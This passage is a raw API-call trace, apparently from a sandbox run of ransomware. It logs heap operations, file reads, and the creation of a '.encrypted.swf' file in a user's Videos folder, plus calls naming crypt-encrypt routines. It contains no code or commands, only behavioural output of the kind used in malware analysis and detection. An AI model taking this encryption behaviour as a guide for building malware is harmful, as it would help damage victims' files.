(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.657] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\ou4nop2hd11p9km.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0043.658] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.659] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.659] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.661] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x667d, lpOverlapped=0x0) returned 1 [0043.662] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667d) returned 0xac2018 [0043.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667d) returned 0x935008 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.666] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667d) returned 0xac2018 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.666] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.667] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.667] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667d) returned 0xac2018 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0043.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1667d) returned 0x94b690 [0043.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.669] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.669] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.669] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.670] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.670] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.671] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.671] 